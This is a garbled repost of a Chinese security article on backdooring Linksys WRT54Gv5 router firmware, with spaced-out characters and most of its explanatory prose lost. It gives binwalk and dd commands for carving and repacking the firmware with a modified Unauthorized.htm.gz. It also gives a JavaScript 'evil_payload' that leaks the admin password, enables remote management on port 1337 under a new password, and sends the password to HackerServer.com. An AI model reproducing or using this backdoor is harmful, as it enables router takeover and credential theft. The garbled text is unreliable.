[8382] 2014-10-28_CiscoLinksys无线路由固件安全分析与后门研究

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-17
2014-10-28_CiscoLinksys无线路由固件安全分析与后门研究 C i s c o   L i n k s y s 线   F r e e B u f   2 0 1 4 - 1 0 - 2 8 西 西 L i n k s y s W R T 5 4 G v 5 线 线 l i n k s y s 便 d e v t t y s 0 . c o m 西 b i n w a l k m a n d a t o r y @ m a n d a t o r y s - b o x : ~ / R e v e r s i n g / 5 v _ L i n k s y s - W R T 5 4 G v 5 $   b i n w a l k   F W _ W R T 5 4 G v 5 v 6 _ 1 . 0 2 . 8 . 0 0 1 _ U S _ 2 0 0 9 1 0 0 5 . b i n D E C I M A L   H E X   D E S C R I P T I O N 5 1 2   0 x 2 0 0   E L F   3 2 - b i t   L S B   M I P S - I I   e x e c u t a b l e ,   M I P S ,   v e r s i o n   1   ( S Y S V )   1 0 1 6 4 8   0 x 1 8 D 1 0   C o p y r i g h t   s t r i n g :   "   1 9 8 4 - 1 9 9 6   W i n d   R i v e r   S y s t e m s ,   I n c . I n c . "   1 0 3 6 6 4   0 x 1 9 4 F 0   L Z M A   c o m p r e s s e d   d a t a ,   p r o p e r t i e s :   0 x 6 C ,   d i c t i o n a r y   s i z e :   8 3 8 8 6 0 8   b y t e s ,   u n c o m p r e s s e d   s i z e :   3 6 8 0 8 6 4   b y t e s   1 1 8 2 6 9 2   0 x 1 2 0 B E 4   T R O C   f i l e s y s t e m ,   1 0 2   f i l e   e n t r i e s   1 1 8 5 1 5 3   0 x 1 2 1 5 8 1   g z i p   c o m p r e s s e d   d a t a ,   w a s   " a p p l y . h t m " ,   f r o m   N T F S   f i l e s y s t e m   ( N T ) ,   l a s t   m o d i f i e d :   F r i   S e p   4   0 3 : 4 5 : 5 8   2 0 0 9 { e p o c h : 1 2 5 2 0 5 0 3 5 8 }   1 1 8 5 8 9 2   0 x 1 2 1 8 6 4   g z i p   c o m p r e s s e d   d a t a ,   w a s   " a p p l y 1 . h t m " ,   f r o m   N T F S   f i l e s y s t e m   ( N T ) ,   l a s t   m o d i f i e d :   F r i   S e p   4   0 3 : 4 5 : 5 8   2 0 0 9 { e p o c h : 1 2 5 2 0 5 0 3 5 8 } h t t p : / / p a s t e b i n . c o m / r a w . p h p ? i = 1 F n P L 3 F v 西 西
0 × 2 0 0 M I P S   b o o t l o a d e r 0 x 1 8 D 1 0 W i n d   R i v e r   S y s t e m s   I n c V x w o r k s   O p e r a t i n g   S y s t e m 0 x 1 9 4 F 0 V x w o r k s   O S / a p p k y . h t m g z i p f i r m w a r e [   B o o t l o a d e r   ]   [   C o p y r i g h t   S t r i n g   ]   [   V x W o r k   O S   &   F i l e s y s t e m   ]   [   T R O C   F i l e s y s t e m   E n t r y   ]   [ g z i p e d   h t m / i m a g e   f i l e s   ] M a g i c   N u m b e r b y t e g z i p M a g i c   N u m b e r 1 f   8 b     b i n w a l k d d . h t m b i n w a l k d d   i f = f i r m w a r e . b i n   b s = 1   s k i p = [ O f f s e t ]   c o u n t = [ N e x t   O f f s e t   -   C u r r e n t   O f f s e t ]   o f = o u t p u t _ f i l e n a m e U n a u t h o r i z e d . h t m l a s t p a s s w o r d . h t m l a s t p a s s w o r d . h t m l a s t p a s s w o r d . h t m < H T M L > < H E A D > < M E T A   h t t p - e q u i v = C o n t e n t - T y p e   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = i s o - 8 8 5 9 - 1 " > < / H E A D > < B O D Y > < P R E > L a s t   P a s s w o r d   :   < T R I _ S T A R T _ L A S T P S W > [ T R I _ L A S T _ P A S S W O R D ] < T R I _ E N D _ L A S T P S W > < / P R E > < / B O D Y > < / H T M L > l a s t p a s s w o r d . h t m 西 < T R I _ S T A R T _ L A S T P S W > [ T R I _ L A S T _ P A S S W O R D ] < T R I _ E N D _ L A S T P S W > U n a u t h o r i z e d . h t m . h t m < H T M L > < B O D Y   B G C O L O R = " # c c 9 9 9 9 " >   < H 4 > 4 0 1   U n a u t h o r i z e d < / H 4 > < ! - - < T R I _ S T A R T _ L A S T P S W > [ T R I _ L A S T _ P A S S W O R D ] < T R I _ E N D _ L A S T P S W >   - - >
l s 9 6 9 9 4 6 8       1 2   - r w - r - - r - -   1 4 4   O c t   1 8   1 4 : 4 4   U n a u t h o r i z e d . h t m . g z 9 6 9 9 4 6 7       1 2   - r w - r w - r - -   1 4 4   O c t   1 8   1 4 : 1 3   U n a u t h o r i z e d _ o r i g i n a l . h t m . g z b i n w a l k 1 3 3 8 0 9 6                   0 x 1 4 6 A F 0                 G I F   i m a g e   d a t a ,   v e r s i o n   " 8 9 a " ,   1 9 2   x   6 4 1 3 4 0 9 4 3                   0 x 1 4 7 6 0 F                 g z i p   c o m p r e s s e d   d a t a ,   w a s   " U n a u t h o r i z e d . h t m " ,   f r o m   N T F S   f i l e s y s t e m   ( N T ) , l a s t   m o d i f i e d :   F r i   S e p     4   0 3 : 4 6 : 0 3   2 0 0 9 1 3 4 1 0 8 7                   0 x 1 4 7 6 9 F                 g z i p   c o m p r e s s e d   d a t a ,   w a s   " U p g r a d e . h t m " ,   f r o m   N T F S   f i l e s y s t e m   ( N T ) ,   l a s t m o d i f i e d :   F r i   S e p     4   0 3 : 4 6 : 0 3   2 0 0 9 1 3 4 4 5 8 5                   0 x 1 4 8 4 4 9                 g z i p   c o m p r e s s e d   d a t a ,   w a s   " U p g S t a t . h t m " ,   f r o m   N T F S   f i l e s y s t e m   ( N T ) ,   l a s t m o d i f i e d :   F r i   S e p     4   0 3 : 4 6 : 0 3   2 0 0 9 U n a u t h o r i z e d . h t m #   C u t   o f f   f i r s t   h a l f   o f   f i r m w a r e   r i g h t   b e f o r e   U n a u t h o r i z e d . h t m . g z d d   i f = F W _ W R T 5 4 G v 5 v 6 _ 1 . 0 2 . 8 . 0 0 1 _ U S _ 2 0 0 9 1 0 0 5 . b i n   b s = 1   c o u n t = 1 3 4 0 9 4 3   o f = f i r s t _ h a l f #   C u t   o u t   t h e   s e c o n d   h a l f   o f   t h e   f i r m w a r e   r i g h t   a f t e r   U n a u t h o r i z e d . h t m . g z d d   i f = F W _ W R T 5 4 G v 5 v 6 _ 1 . 0 2 . 8 . 0 0 1 _ U S _ 2 0 0 9 1 0 0 5 . b i n   b s = 1   s k i p = 1 3 4 1 0 8 7   o f = s e c o n d _ h a l f #   A d d   o u r   b a c k d o o r e d   U n a u t h o r i z e d . h t m . g z   t o   t h e   f i r m w a r e c a t   U n a u t h o r i z e d . h t m . g z   > >   f i r s t _ h a l f #   P u t   t h e   p i e c e s   t o g e t h e r c a t   s e c o n d _ h a l f   > >   f i r s t _ h a l f C o o l 使
U n a u t h o r i z e d . h t m F 1 2 m a n d a t o r y P e r f e c t 西 p a y l o a d p a y l o a d J S J S J S D D o s D N S D N S 使 D N S P C Z l o b   t r o j a n 西 b a s i c . h t m p a y l o a d 1 3 3 7 J S f u n c t i o n   e v i l _ p a y l o a d ( ) {         x m l   =   n e w   X M L H t t p R e q u e s t ( ) ;         x m l . o p e n ( ' P O S T ' ,   ' h t t p : / / a d m i n : < T R I _ S T A R T _ L A S T P S W > [ T R I _ L A S T _ P A S S W O R D ] < T R I _ E N D _ L A S T P S W > @ 1 9 2 . 1 6 8 . 1 . 1 / m a n a g e . t r i ' ) ;         v a r   p a r a m s   =   " r e m o t e _ m g t _ h t t p s = 0 & h t t p _ e n a b l e = 1 & h t t p s _ e n a b l e = 0 & P a s s w d M o d i f y = 0 & h t t p _ p a s s w d = d 6 n w 5 v 1 x 2 p c
7 s t 9 m & h t t p _ p a s s w d C o n f i r m = d 6 n w 5 v 1 x 2 p c 7 s t 9 m & _ h t t p _ e n a b l e = 1 & w e b _ w l _ f i l t e r = 1 & r e m o t e _ m a n a g e m e n t = 1 & h t t p _ w a n p o r t = 1 3 3 7 & u p n p _ e n a b l e = 1 & l a y o u t = e n " ;         x m l . s e t R e q u e s t H e a d e r ( " C o n t e n t - t y p e " ,   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d " ) ;         x m l . s e t R e q u e s t H e a d e r ( " C o n t e n t - l e n g t h " ,   p a r a m s . l e n g t h ) ;         x m l . s e t R e q u e s t H e a d e r ( " C o n n e c t i o n " ,   " c l o s e " ) ;         x m l . s e n d ( p a r a m s ) ;         t h b   =   n e w   X M L H t t p R e q u e s t ( ) ;         t h b . o p e n ( ' G E T ' ,   ' h t t p : / / H a c k e r S e r v e r . c o m / h u e . p h p ? p = < T R I _ S T A R T _ L A S T P S W > [ T R I _ L A S T _ P A S S W O R D ] < T R I _ E N D _ L A S T P S W > ' ) ;         t h b . s e n d ( ) ; } r e q u e s t w a l l a h [ g i f h t t p : / / b l o g . d e p r e s s e d m a r v i n . c o m / i m a g e s / 2 0 1 4 / 1 0 / 0 8 / r o u t e r _ b a c k d o o r . g i f ] p r o o f C & C D N S   S e r v e r [ l i n k s y s - w r t 5 6 g - b a c k d o o r - p a y l o a d F r e e B u f F r e e B u f . C O M ]
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则